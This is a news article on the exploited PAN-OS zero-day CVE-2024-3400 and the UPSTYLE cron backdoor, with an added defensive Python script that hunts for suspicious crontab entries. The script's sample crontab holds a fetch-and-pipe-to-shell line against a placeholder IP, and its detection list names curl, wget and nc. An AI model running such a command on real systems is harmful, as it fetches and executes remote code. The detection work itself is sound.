Palo Alto Networks Zero-Day Flaw Exploited in Targeted Attacks

Palo Alto Networks has detected targeted attacks exploiting a recently discovered critical zero-day vulnerability in its PAN-OS software, tracked as CVE-2024-3400 with a CVSS score of 10.0.

This flaw enables unauthorized actors to execute arbitrary code with root privileges on affected firewalls. Identified as Operation MidnightEclipse, these targeted attacks have been closely monitored following the discovery of the vulnerability.

The vulnerability affects firewalls running PAN-OS 10.2, 11.0 and 11.1 and configured with specific features enabled.

In an advisory published last Friday, Palo Alto Networks confirmed targeted attacks leveraging this flaw, attributing known exploitation to a single threat actor while acknowledging the potential for future exploitation by additional actors.

Operation MidnightEclipse encompasses post-exploitation activity, including the deployment of a Python-based backdoor named UPSTYLE, which is driven by a cron job that runs every minute to execute remotely issued commands.

In their advisory, Palo Alto Networks has shared detailed insights into the backdoor’s behavior, including its persistence mechanisms, command execution and cleanup processes.
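The persistence mechanism described above (a cron job firing every minute to pull and run commands) leaves a recognisable trace in crontab files. The following is an added, defender-side example and is not code from the original article, from Palo Alto Networks or from Unit 42; it scans crontab text for entries that combine a one-minute schedule with a network client, an interpreter, or execution from a world-writable directory. The crontab lines it reads are constructed for illustration and are not real UPSTYLE artefacts; the tool names and directory list are assumptions about what a hunt would reasonably key on.

```python
import re
from dataclasses import dataclass

# Constructed sample crontab (illustrative only; not a real UPSTYLE indicator).
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/logrotate /etc/logrotate.conf
*/5 * * * * /usr/local/bin/collect-metrics.sh
* * * * * /usr/bin/wget -qO- http://203.0.113.10/cmd | /bin/sh
* * * * * /usr/bin/python3 /tmp/.update.py
30 2 * * 0 /usr/bin/backup --full
"""

# Five schedule fields followed by the command. Special strings such as
# @reboot are deliberately not parsed here; extend the pattern if needed.
FIVE_FIELD = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(.*)$")

# Assumed list of tokens a hunt would key on: network clients and interpreters.
NETWORK_OR_INTERPRETER = ("curl", "wget", "nc ", "ncat", "python", "perl", "bash -c", "sh -c")

# Directories that are world-writable on most systems.
WORLD_WRITABLE = re.compile(r"(^|\s)/(tmp|dev/shm|var/tmp)/")


@dataclass
class Finding:
    line_no: int
    schedule: str
    command: str
    reasons: tuple


def parse_crontab(text):
    """Return (line_no, schedule, command) for each non-comment crontab entry."""
    entries = []
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = FIVE_FIELD.match(line)
        if m:
            entries.append((n, " ".join(m.groups()[:5]), m.group(6)))
    return entries


def assess(entries):
    """Flag entries that match at least two suspicious traits at once."""
    findings = []
    for n, sched, cmd in entries:
        reasons = []
        if sched == "* * * * *":
            reasons.append("runs every minute")
        if any(tok in cmd for tok in NETWORK_OR_INTERPRETER):
            reasons.append("invokes network client or interpreter")
        if WORLD_WRITABLE.search(cmd):
            reasons.append("executes from world-writable directory")
        # Requiring two traits keeps routine every-minute jobs out of the results.
        if len(reasons) >= 2:
            findings.append(Finding(n, sched, cmd, tuple(reasons)))
    return findings


if __name__ == "__main__":
    for f in assess(parse_crontab(SAMPLE_CRONTAB)):
        print(f"line {f.line_no}: {f.command!r} -> {', '.join(f.reasons)}")
```

Run against the constructed sample, the two every-minute jobs that fetch content over the network or execute a script from `/tmp` are reported, while the logrotate, five-minute metrics and weekly backup jobs are not. In practice the same logic can be fed the contents of the system and per-user crontab files collected from a device, and any hit should be triaged alongside the vendor's own indicators rather than treated as proof of compromise on its own.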

“Anytime a vulnerability impacts devices directly connected to the Internet, it’s a cause for concern. The fact that these are being actively exploited makes this additionally troublesome,” warned Erich Kron, security awareness advocate at KnowBe4.

“Organizations with vulnerable versions of the operating system should take immediate actions to mitigate the threat by disabling features related to the vulnerability [...] while keeping a vigilant watch for potential malicious network traffic or code execution on the devices.”

To address the issue, Palo Alto Networks advised users to apply hotfixes released on Sunday for affected PAN-OS versions and enable specific threat prevention measures. The company is also offering its Unit 42 Managed Threat Hunting XQL queries to help identify signs of exploitation within network logs.

Palo Alto Networks credited Volexity with discovering the vulnerability, underscoring the value of collaboration in combating cybersecurity threats.

Read more on this vulnerability: Palo Alto Networks Warns About Critical Zero-Day in PAN-OS
